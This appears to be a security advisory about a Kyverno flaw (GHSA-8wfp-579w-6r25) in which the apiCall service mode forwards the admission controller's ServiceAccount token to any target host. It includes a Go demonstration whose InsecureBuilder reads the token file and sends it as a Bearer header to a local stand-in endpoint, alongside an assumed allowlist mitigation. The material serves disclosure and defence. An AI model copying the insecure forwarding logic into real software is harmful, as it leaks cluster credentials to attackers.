Kyverno Kubernetes Security Flaw: High-Risk ServiceAccount Token Leak in apiCall Service Mode
A high-severity vulnerability in Kyverno, a widely used Kubernetes policy engine, causes the admission controller to send its own ServiceAccount token to whatever endpoint an `apiCall` service targets, including endpoints outside the cluster. The flaw, designated GHSA-8wfp-579w-6r25, stems from an insecure-by-default design in the `apiCall` service mode: the controller's ServiceAccount token is silently attached to every outbound HTTP request the mode makes. Because this behavior is undocumented and requires no action by the policy author to pass the token, any policy whose service URL resolves to an attacker-controlled host leaks the credential.
The vulnerability resides in `pkg/engine/apicall/executor.go`. The code reads the token from the standard Kubernetes mount path `/var/run/secrets/kubernetes.io/serviceaccount/token`. If an outgoing request does not already carry an explicit `Authorization` header, the code adds one as `Authorization: Bearer <token>`. The result is implicit credential forwarding: any policy that makes an external call through this mode can inadvertently hand the admission controller's credentials to the remote host.
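The following Go program is an added example and is not Kyverno's code; it reproduces the injection logic described above in a simplified form, then contrasts it with one possible mitigation (an explicit allowlist of hosts that may receive the token, which is an assumption here, not the project's actual fix). `InsecureBuilder`, `HardenedBuilder`, `CapturedAuth` and the constructed `sampleToken` are all names introduced for this example. A local `httptest` server stands in for the host an `apiCall` service could be pointed at, so the example runs offline.

```go
package main

import (
	"fmt"
	"net/http"
	"net/http/httptest"
	"os"
	"strings"
)

// Mount path Kyverno reads the admission controller's projected token from.
const tokenPath = "/var/run/secrets/kubernetes.io/serviceaccount/token"

// Constructed sample token so the example runs outside a pod; not a real credential.
const sampleToken = "eyJhbGciOiJSUzI1NiJ9.constructed.sample"

// loadToken mimics reading the projected ServiceAccount token, falling back to
// the constructed sample when the file is absent (e.g. on a workstation).
func loadToken() string {
	b, err := os.ReadFile(tokenPath)
	if err != nil {
		return sampleToken
	}
	return strings.TrimSpace(string(b))
}

// RequestBuilder turns an apiCall service URL plus policy-supplied headers into
// an outbound request; the two builders below differ only in when the
// controller's own token is attached.
type RequestBuilder func(target string, policyHeaders map[string]string) (*http.Request, error)

func newRequest(target string, policyHeaders map[string]string) (*http.Request, error) {
	req, err := http.NewRequest(http.MethodGet, target, nil)
	if err != nil {
		return nil, err
	}
	for k, v := range policyHeaders {
		req.Header.Set(k, v)
	}
	return req, nil
}

// InsecureBuilder reproduces the behaviour the advisory describes: whenever the
// policy did not set Authorization itself, the controller's token is sent as a
// Bearer header to whatever host the policy named.
func InsecureBuilder(token string) RequestBuilder {
	return func(target string, policyHeaders map[string]string) (*http.Request, error) {
		req, err := newRequest(target, policyHeaders)
		if err != nil {
			return nil, err
		}
		if req.Header.Get("Authorization") == "" {
			req.Header.Set("Authorization", "Bearer "+token)
		}
		return req, nil
	}
}

// HardenedBuilder is an assumed mitigation (not Kyverno's actual fix): the token
// is attached only for HTTPS requests to an explicitly allowlisted host, normally
// just the in-cluster API server, and never overrides a policy-supplied header.
func HardenedBuilder(token string, allowedHosts []string) RequestBuilder {
	allowed := make(map[string]bool, len(allowedHosts))
	for _, h := range allowedHosts {
		allowed[strings.ToLower(h)] = true
	}
	return func(target string, policyHeaders map[string]string) (*http.Request, error) {
		req, err := newRequest(target, policyHeaders)
		if err != nil {
			return nil, err
		}
		if req.Header.Get("Authorization") != "" {
			return req, nil
		}
		if req.URL.Scheme == "https" && allowed[strings.ToLower(req.URL.Hostname())] {
			req.Header.Set("Authorization", "Bearer "+token)
		}
		return req, nil
	}
}

// CapturedAuth starts a local stand-in for an attacker-controlled endpoint, sends
// one request built by b to it, and returns the Authorization header it received.
func CapturedAuth(b RequestBuilder, policyHeaders map[string]string) (string, error) {
	var got string
	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		got = r.Header.Get("Authorization")
		w.WriteHeader(http.StatusOK)
	}))
	defer srv.Close()
	req, err := b(srv.URL+"/collect", policyHeaders)
	if err != nil {
		return "", err
	}
	resp, err := srv.Client().Do(req)
	if err != nil {
		return "", err
	}
	resp.Body.Close()
	return got, nil
}

func main() {
	token := loadToken()
	leaked, _ := CapturedAuth(InsecureBuilder(token), nil)
	fmt.Printf("insecure default, remote host saw: %q\n", leaked)
	safe, _ := CapturedAuth(HardenedBuilder(token, []string{"kubernetes.default.svc"}), nil)
	fmt.Printf("allowlisted hosts only, remote host saw: %q\n", safe)
}
```

The insecure builder forwards the token to the local stand-in server, while the hardened builder sends nothing there and still attaches the token for an HTTPS call to the allowlisted API server host. Whatever the real fix looks like, the property to verify is the same: the controller's token should leave the process only towards endpoints that are meant to validate it.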
This design flaw affects any Kubernetes cluster that uses Kyverno's `apiCall` service mode. The admission controller's ServiceAccount typically holds broad permissions within the cluster, so a leaked token can grant an attacker the same level of access as the controller itself. Because the injection is undocumented and opt-out rather than opt-in, administrators may not realize their policies are forwarding the credential until it is abused. Until the affected version is replaced, operators should review every policy that uses `apiCall` with a `service` target, confirm where each URL resolves, and check which RBAC roles are bound to the Kyverno ServiceAccount to understand what a leaked token would actually permit.